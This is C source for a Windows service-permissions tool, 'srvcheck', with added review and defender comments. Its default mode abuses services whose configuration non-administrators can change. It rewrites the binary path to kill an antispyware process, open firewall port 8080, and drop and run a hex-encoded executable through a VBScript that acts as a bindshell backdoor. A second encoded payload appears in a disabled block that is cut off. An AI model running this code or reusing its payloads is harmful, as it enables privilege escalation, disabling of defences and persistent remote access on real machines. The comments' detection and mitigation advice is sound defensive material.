#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
00048
00049
00050 void doFormatMessage( unsigned int dwLastErr );
00051 void usage(void);
00052 DWORD StartModifiedService(SC_HANDLE SCM, char *srv, BOOL dbg);
00053 void ListVulnerableService(char *host);
00054 char *GetOwner(char *servicio);
00055
00056
/*
 * Command lines that main() writes, one ChangeServiceConfig call each, into
 * the target service's binary path so the SCM runs them when the service is
 * started: remove the \HXR drop directory, kill the gcasDtServ.exe process,
 * and open TCP 8080 in the Windows firewall (the rule is named SrvCheck).
 *
 * Defender note: a service whose binary path is a cmd.exe / taskkill.exe /
 * netsh command line instead of a service executable is a reliable indicator
 * of this technique; audit service configuration changes and review binary
 * paths of services that are not owned by an installed product.
 */
char init[]="cmd.exe /c rd /Q /S \\HXR";
char antispyware[]="taskkill.exe /IM gcasDtServ.exe";
char firewall[]="cmd.exe /c netsh firewall add portopening TCP 8080 SrvCheck ENABLE ALL";
00060
00061
/*
 * One long command line, also installed as a service binary path by main():
 * it creates \HXR, appends a VBScript to \HXR\a.vbs with a series of echo
 * commands, and finally runs that script. The script decodes the hex string
 * f (a "zN" token stands for N zero bytes, any other pair is one hex byte),
 * writes the result to \HXR\a.exe and launches it; the hex begins with the
 * "MZ" signature (4D5A), i.e. the decoded file is a Windows executable. The
 * payload bytes themselves are not documented here.
 *
 * Defender note: the artifacts this leaves on a host are the \HXR directory,
 * \HXR\a.vbs, \HXR\a.exe and a service whose binary path starts with
 * "cmd.exe /c md \HXR"; the service is also switched to automatic start by
 * main(), so the path persists across reboots until the service
 * configuration is restored.
 */
char EncodedBackdoor[]=
"cmd.exe /c md \\HXR && "
"echo f=\"4D5A900003z3z04z3z504500004C01020046534721z8zE0000F010B01z3z04z3z06z6z3F43z3z1000000Cz5z40000010z3z02000004z7z04z8z50z3z\">\\HXR\\a.vbs && "
"echo f=f ^&\"02z6z02z5z10000010z4z10000010z6z10z11z0444000034z119z74z4z30z3z10z22zE00000C0z4z7461z3z10z3z4000003804z3z02z14zE00000C04B\">>\\HXR\\a.vbs && "
"echo f=f ^& \"45524E454C33322E646C6Cz3z4C6F61644C69627261727941000047657450726F6341646472657373z25zFA434000EE434000F0434000980140000010\">>\\HXR\\a.vbs && "
"echo f=f ^& \"40000040400001204000013040z5z7A21400001z3z2C4440z57z551C8BEC818E24021C1E53405D0856578D4501C033F6BF183040C050C7DD16F72E0C\">>\\HXR\\a.vbs && "
"echo f=f ^& \"0EC44403893275C806CC07D0935DD41026E009CFE4A47DE80CD806DC80ECFF18154C206E5653E5CDB81380CB5033046810CF83576F2236B1078D85DC\">>\\HXR\\a.vbs && "
"echo f=f ^& \"FDAF792A02B2DD246C2D34C86A06E401E802C81E708668901F34188BD866C0F002C845744FAF89ACF21658886A1081F4E714080850A53AF032532A5C\">>\\HXR\\a.vbs && "
"echo f=f ^& \"1101911360298D18446450CE32F81268236A443DEE6CC05BA09850E8414FB38F4EB02219431883C4181B899DA3210AD2759C502C4EF4988C01086849\">>\\HXR\\a.vbs && "
"echo f=f ^& \"10087C8198F3EC10EB32A406A806ACB044085F075E5BC9C21007CCE725DD1D53466AD1688048C4D063120A64A151BB42DC8925A00883EC6768FA57C0\">>\\HXR\\a.vbs && "
"echo f=f ^& \"65E833DB903D52FCED22400D59830D30BFF7210E34322A14278BD62C1B3289081C1819280CA151380DC1A3DF151DE8108C0C391D1C17751B0C68C2DB\">>\\HXR\\a.vbs && "
"echo f=f ^& \"2258101859E8E2D7680CDD3154082831CD1FA124150A3294E5398650FF35201BD114E57E669009A02429151CB11404337084489A13C724A1CA6F3AC8\">>\\HXR\\a.vbs && "
"echo f=f ^& \"10078C803E22533A461D138A06C3C374043C281CF213F30F0A2076F2D519D09EA417089EF6BE830174110FB7B8D4EB0ED9583CD8472CB0F56A0A5890\">>\\HXR\\a.vbs && "
"echo f=f ^& \"5649539D2204A17D86350903989822692C7A8B73EC75080009894D885051E80FA98559C5C3FE402FFF756488402454642A28064534245303A2058206\">>\\HXR\\a.vbs && "
"echo f=f ^& \"E817902A33C0E7D1CC5D01954C442C4199DBz3zAF01F644FF843812403698080000AD0180636D642E6578E5C0576F7070600100011C58204001575332\">>\\HXR\\a.vbs && "
"echo f=f ^& \"5F33CC2E64716CE1C108C285010248060D6401320319730859395341036F636B6574BE1854092210C08B4D5356435243540C615F733A75C708726DAE\">>\\HXR\\a.vbs && "
"echo f=f ^& \"ED680CDF392370737E663E6F64D20B3D637CA60D6C67524A69796E7972CFB66F9EF6712AEE7861690D586370F146E56CEB7080556711C4636DC8BA6E\">>\\HXR\\a.vbs && "
"echo f=f ^& \"365C1CDF2D7125646ABECC6EB2E669761ACFA86E6E728F6CAA707F4E9DBCEED2CF79DEA8507663DF985E685B6E802A7033D188AF4B4539524EAB4CF6\">>\\HXR\\a.vbs && "
"echo f=f ^& \"99496053CA8884B41E70826E666F4185104D1FA0B25C48AC3422457B72A3CBF35067C094731C1E01634C855553438640025465676973A79443C6613E\">>\\HXR\\a.vbs && "
"echo f=f ^& \"2B4578301457AB0A646F7710180200BEA4014000AD93AD97AD5696B280A4B680FF1373F933C9FF13731633C0FF13731FB68041B010FF1312C073FA75\">>\\HXR\\a.vbs && "
"echo f=f ^& \"3CAAEBE0FF530802F683D901750EFF5304EB26ACD1E8742F13C9EB1A9148C1E008ACFF53043D007D0000730A80FC05730683F87F77024141958BC5B6\">>\\HXR\\a.vbs && "
"echo f=f ^& \"00568BF72BF0F3A45EEB9D8BD65EAD48740A7902AD50568BF297EB87AD935E46AD9756FF1395AC84C075FBFE0E74F0790546AD50EB09FE0E0F8460CD\">>\\HXR\\a.vbs && "
"echo f=f ^& \"FFFF5655FF5304ABEBE033C941FF1313C9FF1372F8C302D275058A164612D2C32C44z10z540100002C44z22z610100006F01z14z\">>\\HXR\\a.vbs && "
"echo i=1 : t = \"\" : While i^<=len(f) : If mid(f,i,1) = \"z\" then>>\\HXR\\a.vbs && "
"echo a=i+1 : k = 0 : while mid(f,a,1)^<^>\"z\" : k = k*10 + mid(f,a,1) : a = a+1 : WEnd : i = a+1 : for a=1 to k : t = t + \"00\" : Next>>\\HXR\\a.vbs && "
"echo ElseIf mid(f,i,1) ^<^> \"z\" then : t = t ^& mid(f,i,2) : i = i+2 >>\\HXR\\a.vbs && "
"echo end if : WEnd : Set o = CreateObject(\"Scripting.FileSystemObject\") >>\\HXR\\a.vbs && "
"echo Set n = o.CreateTextFile(\"\\HXR\\a.exe\", ForWriting) : i = 1 : while i ^< len(t)>>\\HXR\\a.vbs && "
"echo f = Int(\"&H\" ^& Mid(t, i, 2)) : n.Write(Chr(f)) : i = i+2 : WEnd : n.Close>>\\HXR\\a.vbs && "
"echo Set s=CreateObject(\"WScript.Shell\") : s.run(\"\\HXR\\a.exe\")>>\\HXR\\a.vbs &&"
"\\HXR\\a.vbs /B";
00093
00094
00095
/* Mode flags set by main()'s option parser: LIST by -l, HELP by -?, STOP by
 * -s. BACKDOOR starts at 1 and is cleared by -c (custom command line). */
BYTE LIST=0,HELP=0,BACKDOOR=1, STOP=0;
/* "\\host\IPC$" UNC name built by main() for the remote connection; also
 * used by ListVulnerableService() and main() to cancel that connection. */
char RemoteHost[256];
/* Scratch buffer that GetOwner() fills with the service account name read
 * from the registry and returns a pointer to. */
char permission[256];
00099
00100
/*
 * Entry point for srvcheck.
 *
 * Parses the command line, optionally maps \\host\IPC$ with the supplied
 * credentials (-H, then -u/-p), and then either lists the services the caller
 * is allowed to reconfigure (-l), stops a service (-s), or replaces one
 * service's binary path with a command line (-m, using -c or the built-in
 * strings at the top of the file) and asks the SCM to start it.
 *
 * Risk summary: everything below rests on a service whose DACL grants
 * SERVICE_CHANGE_CONFIG to a non-administrative caller; a command line
 * written into such a service's binary path runs under the service's own
 * account when the SCM starts it. Mitigation is a correct service DACL;
 * detection is auditing of service configuration changes and of binary paths
 * that are cmd.exe/netsh/taskkill command lines.
 *
 * Returns 1 on the normal path; most error paths exit(-1) directly and the
 * -l and -s paths exit on their own.
 */
int main(int argc, char* argv[]) {

SC_HANDLE SCM,Svc;
DWORD ret,len;
char CurrentUserName[256];
char *newPath=NULL;
char *host=NULL;
char *user=NULL;
char *pass=NULL;
char *srv=NULL;
int i;
NETRESOURCE NET;
SERVICE_STATUS_PROCESS StopStatus;

printf(" Services Permissions checker v2.0\n");
printf(" (c) 2006 Andres Tarasco - atarasco%cgmail.com\n\n",'@');

/* usage() never returns (it ends with exit(-1)). */
if (argc==1) usage();
/* Options are exactly two characters ("-x"); any other argument is ignored
 * unless it was consumed as the value of the preceding option. */
for (i=1;i<argc;i++) {
if ( (strlen(argv[i])==2) && (argv[i][0]=='-') ) {
switch (argv[i][1]) {
case 'l': LIST=1; break;
case 'm': srv=argv[i+1]; i=i+1;break;
/* -u and -p are only accepted after -H.
 * NOTE(review): "i=i++" modifies i twice without a sequence point, which is
 * undefined behaviour in C; the 'm' and 'c' cases use i=i+1. argv[i+1] is
 * also read without checking that i+1 < argc. */
case 'u': if (!host) usage(); user=argv[i+1]; i=i++; break;
case 'p': if (!host) usage(); pass=argv[i+1]; i=i++; break;
case 'H': host=argv[i+1]; i=i++; break;
case 'c': newPath=argv[i+1]; i=i+1; BACKDOOR=0; break;
case 's': STOP=1; break;
case '?': HELP=1; usage(); break;
default: printf("Unknown Parameter: %s\n",argv[i]);usage(); break;
}
}
}

if ((!LIST) && (!srv) )usage();

if (host) {
printf("[+] Trying to connect to remote SCM\n");
/* NOTE(review): unbounded sprintf into RemoteHost[256]; a host argument of
 * roughly 250 bytes or more overruns the buffer. */
sprintf(RemoteHost,"\\\\%s\\IPC$",host);
printf("[+] Host: %s\n",RemoteHost);
printf("[+] Username: %s\n",user);
/* The password is echoed to stdout in clear text; anything that captures
 * the console (redirected output, session logs) captures the credential. */
printf("[+] Password: %s\n",pass);

/* Only four NETRESOURCE fields are set; the remaining members are left
 * uninitialized on the stack. */
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;
NET.lpLocalName=NULL;
NET.lpRemoteName = (char *)RemoteHost;
/* With user==NULL the current logon's credentials are used. WNet* calls
 * return the error code directly rather than through GetLastError(). */
ret=WNetAddConnection2(&NET,pass,user,CONNECT_COMMANDLINE);


if ( (ret!=NO_ERROR) && (user !=NULL) ) {
/* 1219 is ERROR_SESSION_CREDENTIAL_CONFLICT: a session to this host already
 * exists under other credentials, so it is cancelled and re-created. */
if (ret==1219) {
printf("[-] Credentials mismatch. Removing old connection\n");
WNetCancelConnection2(RemoteHost,NULL,TRUE);
ret=WNetAddConnection2(&NET,pass,user,CONNECT_UPDATE_PROFILE);
} else {
/* 1326 is ERROR_LOGON_FAILURE: one retry with a "localhost\" prefix when
 * the user name carried no domain part. */
if (ret==1326) {
if (strchr(user,'\\')==NULL) {
sprintf(CurrentUserName,"localhost\\%s",user);
printf("[-] Unknown Username or password\n");
printf("[+] Trying \"%s\" as new username\n",CurrentUserName);
ret=WNetAddConnection2(&NET,pass,CurrentUserName,CONNECT_UPDATE_PROFILE);
}
}
}
if (ret!=NO_ERROR) {
printf("WNetAddConnection Failed to %s (%s/ %s)\n",RemoteHost,user,pass);
/* NOTE(review): ret already holds the failure code; GetLastError() here
 * may describe something else. */
doFormatMessage(GetLastError());
exit(-1);
}
}
/* NOTE(review): reached even when the connect failed with user==NULL, since
 * the block above is then skipped entirely; "OK" can be printed for a
 * failed connection. */
printf("[+] Network Connection OK\n");

} else {
printf("[+] Trying to enumerate local resources\n");
/* GetUserName's result is not checked; the name is only printed. */
len=sizeof(CurrentUserName)-1;
GetUserName( CurrentUserName,&len);
printf("[+] Username: %s\n",CurrentUserName);
}


if (LIST) {
/* ListVulnerableService() exits on every path; this exit(1) is unreachable. */
ListVulnerableService(host);
exit(1);
}




/* NOTE(review): SERVICE_START is a per-service right being passed as an SCM
 * access mask; its bit is reinterpreted here — presumably SC_MANAGER_CONNECT
 * was intended. */
SCM = OpenSCManager(host,NULL,STANDARD_RIGHTS_WRITE | SERVICE_START );
if (!SCM){
printf("[-] OpenScManager() FAILED\n");
doFormatMessage(GetLastError());
exit(-1);
}
/* The caller must be able to open the service with SERVICE_CHANGE_CONFIG;
 * that is exactly the condition ListVulnerableService() reports on. SCM is
 * not closed on the failure path below. */
if (STOP) {
Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE | SERVICE_STOP);
} else {
Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);
}

if (Svc==NULL) {
printf("[-] Unable to open Service %s\n",srv);
exit(-1);
}





if (STOP) {
printf("[+] Stopping previously running instances...\n");
/* NOTE(review): ControlService returns non-zero on SUCCESS, so the error
 * text is printed when the stop worked and nothing when it failed.
 * StopStatus is a SERVICE_STATUS_PROCESS passed where a SERVICE_STATUS is
 * expected; presumably it works only because the structs share a prefix. */
if (ControlService(Svc,SERVICE_CONTROL_STOP,&StopStatus)!=0) {
doFormatMessage(GetLastError());

}
/* -s always ends here; it is never combined with the modification below,
 * and neither handle is closed first. */
exit(-1);
}


if (BACKDOOR) {
/* Default mode: the service's binary path is rewritten four times in a row
 * and the service started after each rewrite, so the SCM executes each
 * command line as the service account (strings init, firewall, antispyware
 * and EncodedBackdoor at the top of the file). Each call also forces
 * SERVICE_AUTO_START, and the original path is never queried or restored,
 * so the last command line stays configured to run at boot. Every
 * ChangeServiceConfig call is a service configuration change that audit
 * logging can capture. */
printf("[+] Uninstalling previous backdoors\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,init,NULL,NULL,"",
NULL,NULL,NULL);

/* ChangeServiceConfig returns non-zero on success. The return value of
 * StartModifiedService() is ignored on every call. */
if (ret!=0) StartModifiedService(SCM,srv,0);

printf("[+] Granting Remote bindshell Execution..\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,firewall,NULL,NULL,"",
NULL,NULL,NULL);
if (ret!=0) StartModifiedService(SCM,srv,0);
printf("[+] Shutting down remote antispyware Service =)\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,antispyware,NULL,NULL,"",
NULL,NULL,NULL);
if (ret!=0) StartModifiedService(SCM,srv,0);
printf("[+] Installing Backdoor Code...\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,EncodedBackdoor,NULL,NULL,"",
NULL,NULL,NULL);
} else {
/* -c mode: the user-supplied command line becomes the binary path. */
printf("[+] Sending custom commands to the service\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,newPath,NULL,NULL,"",
NULL,NULL,NULL);
}

if (ret!=0) {
printf("[+] The service have been succesfully modified =)\n");
CloseServiceHandle(Svc);
StartModifiedService(SCM,srv,1);
} else {
printf("[-] Service modification Failed\n");
/* NOTE(review): ret is 0 here, so the text printed is for error code 0;
 * GetLastError() holds the real reason. Svc is not closed on this path. */
doFormatMessage(ret);
}
CloseServiceHandle(SCM);
if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
return(1);
}
00267
00268
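/*
 * Prints a Win32 error code together with the system's message text for it.
 *
 * dwLastErr: the error code, normally the value of GetLastError() or an
 *            error returned directly by an API such as WNetAddConnection2.
 *
 * FormatMessage is asked to allocate the message buffer. The original
 * ignored its return value, so on failure (unknown code, allocation failure)
 * an uninitialized pointer reached printf and LocalFree; this version checks
 * the result and prints only the number in that case. "%u" is used because
 * the argument is unsigned.
 */
void doFormatMessage( unsigned int dwLastErr ) {
    LPVOID lpMsgBuf = NULL;
    DWORD n;

    n = FormatMessage(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_IGNORE_INSERTS |
        FORMAT_MESSAGE_FROM_SYSTEM,
        NULL,
        dwLastErr,
        MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
        (LPTSTR) &lpMsgBuf,
        0,
        NULL );

    if (n == 0 || lpMsgBuf == NULL) {
        /* No message text available; still report the code itself. */
        printf("ErrorCode %u: (no description available)\n", dwLastErr);
        return;
    }

    printf("ErrorCode %u: %s\n", dwLastErr, (char *)lpMsgBuf);
    LocalFree( lpMsgBuf );    /* buffer was allocated by FormatMessage */
}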
00284
00285
00286
/*
 * Reopens service `srv` through `SCM` with SERVICE_ALL_ACCESS, calls
 * StartService and, when the start was accepted, polls QueryServiceStatusEx
 * until the service leaves SERVICE_START_PENDING.
 *
 * SCM: open service control manager handle (local or remote).
 * srv: service name.
 * dbg: non-zero to print progress and error text; zero for a silent attempt.
 *
 * Returns 1 when the service reached SERVICE_RUNNING; 0 otherwise, which
 * includes the ERROR_SERVICE_REQUEST_TIMEOUT case the tool expects when the
 * binary path is an ordinary command line rather than a service; (DWORD)-1
 * when OpenService failed; (DWORD)-2 when QueryServiceStatusEx failed; or
 * the StartService error code for any other start failure. main() ignores
 * the return value on every call.
 *
 * NOTE(review): Svc is released only on the path that falls through to
 * CloseServiceHandle(Svc) after the wait loop; the timeout path, the
 * StartService error path and both QueryServiceStatusEx failures return
 * with the handle still open.
 */
DWORD StartModifiedService(SC_HANDLE SCM, char *srv, BOOL dbg) {

SC_HANDLE Svc;
DWORD Error;
SERVICE_STATUS_PROCESS StartStatus;
DWORD dwByteNeeded;

DWORD dwOldCheckPoint;
DWORD dwStartTickCount;
DWORD dwWaitTime;

/* SERVICE_ALL_ACCESS is requested here although main() only needed
 * SERVICE_CHANGE_CONFIG; the reopen may fail on a service that grants the
 * latter but not full access. */
Svc= OpenService( SCM, srv, SERVICE_ALL_ACCESS);

if (Svc==NULL) {
if (dbg) printf("[-] Unable to reopen service for starting..\n");
return(-1);
} else {
if (dbg) printf("[+] Service Opened. Trying to Start... (wait a few seconds)\n");
}

if (!StartService(Svc,0,NULL)) {
Error=GetLastError();
/* 1053 is ERROR_SERVICE_REQUEST_TIMEOUT: the SCM launched the binary path
 * but it never reported in as a service. For a command line written by
 * main() that is the expected outcome, so it is reported as success. */
if (Error==1053) {
if (dbg) {
printf("[+] StarteService() Error due to a non service application execution\n");
printf("[+] Ignore it. Your application should be executed =)\n");
/* BACKDOOR is the file-scope flag cleared by the -c option. */
if (BACKDOOR) {
printf("[+] Now connect to port 8080 and enjoy your new privileges\n");
}
}
} else {
if (dbg) {
printf("[-] Unable to start Service :/\n");
doFormatMessage(Error);
}
return(Error);
}

} else {
if (dbg) printf("[+] Starting Service....\n");
if (!QueryServiceStatusEx(
Svc,
SC_STATUS_PROCESS_INFO,
&StartStatus,
sizeof(SERVICE_STATUS_PROCESS),
&dwByteNeeded) )
{
if (dbg) printf("[-] Unable to QueryServiceStatusEx() \n");
return(-2);
} else {



/* Wait loop: sleep a tenth of the service's wait hint, clamped to
 * 1..10 seconds, and keep waiting while the checkpoint advances; give up
 * once no progress has been made for longer than the hint. */
dwStartTickCount = GetTickCount();
dwOldCheckPoint = StartStatus.dwCheckPoint;
while (StartStatus.dwCurrentState == SERVICE_START_PENDING)
{
if (dbg) printf("Wait Time: %i\n",StartStatus.dwWaitHint);
dwWaitTime = StartStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
dwWaitTime = 10000;
Sleep( dwWaitTime );


if (!QueryServiceStatusEx(
Svc,
SC_STATUS_PROCESS_INFO,
&StartStatus,
sizeof(SERVICE_STATUS_PROCESS),
&dwByteNeeded ) )
{
if (dbg) printf("[-] Unable to QueryServiceStatusEx() \n");
return(-2);
}
if ( StartStatus.dwCheckPoint > dwOldCheckPoint )
{
/* Progress: restart the timeout window from now. */
dwStartTickCount = GetTickCount();
dwOldCheckPoint = StartStatus.dwCheckPoint;
} else {
if(GetTickCount()-dwStartTickCount > StartStatus.dwWaitHint)
{
/* The message is Spanish for "the service has not started...". */
if (dbg) printf("el servicio no se ha arrancado...\n");
break;
}
}
}
}
CloseServiceHandle(Svc);
if (StartStatus.dwCurrentState == SERVICE_RUNNING)
{
if (dbg) printf("[+] StartService SUCCESS.\n");
return 1;
}
else
{
if (dbg) printf("\n[-] Service not started. \n");
}
}
return(0);
}
00391
00392
00393
00394
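/*
 * Prints the option summary and terminates the process with exit(-1); with
 * the file-scope HELP flag set (the -? option) a few example invocations are
 * printed as well. Never returns, so callers use it as a fatal "bad
 * arguments" exit.
 *
 * Fix: the third example line was terminated with a comma rather than a
 * semicolon, turning two printf calls into one comma expression by accident;
 * both still executed, but the statement is now written as intended.
 */
void usage(void) {
    printf(" Usage:\n\t-l\t\t list vulnerable services\n");
    printf("\t-m <service>\t modify the configuration for that service\n");
    printf("\t-c <command>\t Command to execute throw remote service\n");
    printf("\t\t\t by default. bindshell application will be used\n");
    printf("\t-H <Host>\t specify a remote host to connect ip/netbiosname)\n");
    printf("\t-u <user>\t if not seletected Default logon credentials used)\n");
    printf("\t-p <password>\t if not used Default logon credentials used)\n");
    printf("\t-?\t\t Extended information with samples\n");

    if (HELP) {
        printf(" examples:\n");
        printf("\tsrvcheck.exe -l (list local vulnerabilities)\n");
        printf("\tsrvcheck.exe -m service (spawn a shell at port 8080)\n");
        printf("\tsrvcheck.exe -m service -c \"cmd.exe /c md c:\\PWNED\"\n");
        printf("\tsrvcheck -l -H host (list remote vulnerabilities)\n");
    }
    exit(-1);
}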
00414
00415
00416
/*
 * Enumerates every Win32 and driver service on `host` (NULL = local machine)
 * and prints those the current caller can open with SERVICE_CHANGE_CONFIG,
 * i.e. whose DACL would let this caller replace their binary path. For each
 * one it prints the name, display name, current state, the account it runs
 * as (local machine only, via GetOwner) and its configured binary path.
 * Never returns: every path ends in exit().
 *
 * This is the audit half of the tool; an administrator can run the same
 * check to find services whose security descriptor is too permissive. The
 * remediation for a listed service is to remove SERVICE_CHANGE_CONFIG (and
 * any generic/all-access grant) for non-administrative principals in the
 * service's security descriptor.
 *
 * NOTE(review): the enumeration buffer is a fixed 65535 bytes and the call is
 * made once; a host whose service list does not fit is presumably reported as
 * "EnumServicesStatusEx FAILED" instead of being paged with nResumeHandle.
 * Inside the loop, neither the Svc handle nor the lpConfig allocation is ever
 * released, and LocalAlloc for lpConfig is not NULL-checked.
 */
void ListVulnerableService(char *host) {
SC_HANDLE SCM;
SC_HANDLE Svc;
DWORD nResumeHandle;
DWORD dwServiceType;
LPENUM_SERVICE_STATUS_PROCESS lpServices;
DWORD nSize = 0;
DWORD nServicesReturned;
unsigned int n;
unsigned int l=0;
DWORD dwByteNeeded;
LPQUERY_SERVICE_CONFIG lpConfig;
char *p;

SCM = OpenSCManager(host,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if (!SCM){
printf("[-] OpenScManager() FAILED\n");
doFormatMessage(GetLastError());
exit(-1);
}
nResumeHandle = 0;
dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;
/* LPTR = fixed, zero-initialized memory. */
lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);
if (!lpServices) {
printf("[-] CRITICAL ERROR: LocalAlloc() Failed\n");
exit(-1);
}
/* NOTE(review): sizeof(lpServices) is the size of the pointer, not of the
 * 65535-byte buffer; harmless only because LPTR already zero-filled it. */
memset(lpServices,'\0',sizeof(lpServices));
if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
dwServiceType, SERVICE_STATE_ALL,
(LPBYTE)lpServices, 65535,
&nSize, &nServicesReturned,
&nResumeHandle, NULL) == 0)
{
printf("EnumServicesStatusEx FAILED\n");
exit(-1);
}

printf("[+] Listing Vulnerable Services...\n");
for (n = 0; n < nServicesReturned; n++) {
/* The access check that matters is SERVICE_CHANGE_CONFIG: if OpenService
 * succeeds, the caller may change this service's configuration.
 * NOTE(review): SC_MANAGER_ENUMERATE_SERVICE is an SCM-handle right, not a
 * service right; its bit is reinterpreted here, presumably unintentionally. */
Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
if (Svc!=NULL) {
l++;
printf("\n [%s]\t\t%s\n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
printf(" Status: 0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
/* GetOwner reads HKLM directly, so it is only meaningful locally. */
if (!host) {
p=GetOwner(lpServices[n].lpServiceName);
if (p) {
printf(" Context:\t\t%s\n",p);
}
}
dwByteNeeded = 0;
/* NOTE(review): allocated per service, never freed, never NULL-checked. */
lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024*8);
if (QueryServiceConfig(Svc, lpConfig, 1024*8, &dwByteNeeded)!=0) {
printf(" Parameter:\t\t%s\n",lpConfig->lpBinaryPathName);
}else {
doFormatMessage(GetLastError());
}
}
}
printf("\n[+] Analyzed %i Services in your system\n",nServicesReturned);
if (l>0) {
printf("[+] You were Lucky. %i vulnerable services found\n",l);
} else {
printf("[+] Your system is secure! Great! :/\n");
}
/* Drops the IPC$ session main() established for a remote host. */
if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
CloseServiceHandle(SCM);
LocalFree(lpServices);
exit(1);
}
00488
00489
00490
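/*
 * Looks up the account a service runs as: the "ObjectName" value under the
 * service's key in SYSTEM\CurrentControlSet\Services on the local machine.
 *
 * servicio: service name (the key name under the Services key).
 *
 * Returns a pointer into the file-scope `permission` buffer, which is
 * overwritten by the next call and must not be freed, or NULL when the name
 * is missing or too long, the key cannot be opened, the value is absent, or
 * the value is not a string.
 *
 * Changes from the original: the key path is length-checked before sprintf
 * instead of being written unbounded into path[256]; the value is read into
 * a buffer one byte shorter than `permission` and always NUL-terminated
 * (RegQueryValueEx does not guarantee a terminator); and the value type is
 * checked so that a non-string value is not printed as text.
 */
char *GetOwner(char *servicio) {
    static const char prefix[] = "SYSTEM\\CurrentControlSet\\Services\\";
    char path[256];
    HKEY hReg = NULL;
    DWORD type = 0;
    /* Leave one byte for the terminator added below. */
    DWORD len = sizeof(permission) - 1;
    LONG rc;

    if (servicio == NULL) {
        return NULL;
    }
    /* prefix length (sizeof - 1) + name + NUL must fit in path. */
    if (strlen(servicio) > sizeof(path) - sizeof(prefix)) {
        return NULL;
    }
    sprintf(path, "%s%s", prefix, servicio);

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_QUERY_VALUE, &hReg) != ERROR_SUCCESS) {
        return NULL;
    }

    rc = RegQueryValueEx(hReg, "ObjectName", NULL, &type, (LPBYTE)permission, &len);
    RegCloseKey(hReg);

    if (rc != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ)) {
        return NULL;
    }
    /* len is at most sizeof(permission) - 1 because that is what was offered;
     * the stored string may or may not include its own NUL, so add one. */
    permission[len] = '\0';
    return permission;
}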
00507
00508
00509
00510
00511
00512 #if 0
00513
00514
00515 char init[]="cmd.exe /c rd /Q /S \\srvcheck";
00516 char antispyware[]="taskkill.exe /IM gcasDtServ.exe";
00517 char firewall[]="netsh firewall add portopening TCP 8080 SrvCheck";
00518
00519 char EncodedBackdoor[]=
00520 "cmd.exe /c md \\srvcheck && "
00521 "echo f=\"4D5A900003z3z04z3z504500004C010100188AEC3Fz8zE0000F010B0106000002z10z2810z3z1000000Cz5z40000010z3z02000004z7z04z8z20z3z02\">\\srvcheck\\a.vbs && "
00522 "echo f=f ^& \"z6z02z5z10000010z4z10000010z6z10z11z041100003Cz84z10000020z27z2E74657874z3z9A01z3z1000009C01z3z02z14z200000E010z11z041100\">>\\srvcheck\\a.vbs && "
00523 "echo f=f ^& \"003Cz51z436865636B73756D20526F636B7A2121z17z10000020z27z2E74657874z3z9A01z3z10z3z02z3z02z14z200000E0z40z6011z6z0D00008002\">>\\srvcheck\\a.vbs && "
00524 "echo f=f ^& \"000080801100007300008001000080z4z636D642E65786500558BEC81ECF801000053568D8508FEFFFF57506802020000FF151410400033F65656566A\">>\\srvcheck\\a.vbs && "
00525 "echo f=f ^& \"066A016A02FF15101040008BD883FBFF0F8499z3z8D45EC6A10505366C745EC02008975F066C745EE1F90FF150C10400083F8FF740C68FFFFFF7F53FF\">>\\srvcheck\\a.vbs && "
00526 "echo f=f ^& \"150810400033C08D7DDCABABABAB8D45FC66C745DC0200508D45DC5053C745FC10z3zFF15181040008BD083FAFF74406A1133C0598D7D98F3AB8D45EC\">>\\srvcheck\\a.vbs && "
00527 "echo f=f ^& \"C7459844z3z508D459850565668400000086A015656682010400056C745C4000100008955D88955D48955D0FF15001040005F5E33C05BC9C210004011\">>\\srvcheck\\a.vbs && "
00528 "echo f=f ^& \"z10z7211z3z1000004811z10z8E1100000810z22z6011z6z0D00008002000080801100007300008001000080z4z470043726561746550726F63657373\">>\\srvcheck\\a.vbs && "
00529 "echo f=f ^& \"4100004B45524E454C33322E646C6C00003D00575341536F636B65744100005753325F33322E646C6Cz4z\">>\\srvcheck\\a.vbs && "
00530 "echo i=1 : t = \"\" : While i^<=len(f) : If mid(f,i,1) = \"z\" then>>\\srvcheck\\a.vbs && "
00531 "echo a=i+1 : k = 0 : while mid(f,a,1)^<^>\"z\" : k = k*10 + mid(f,a,1) : a = a+1 : WEnd : i = a+1 : for a=1 to k : t = t + \"00\" : Next>>\\srvcheck\\a.vbs && "
00532 "echo ElseIf mid(f,i,1) ^<^> \"z\" then : t = t ^& mid(f,i,2) : i = i+2 >>\\srvcheck\\a.vbs && "
00533 "echo end if : WEnd : Set o = CreateObject(\"Scripting.FileSystemObject\") >>\\srvcheck\\a.vbs && "
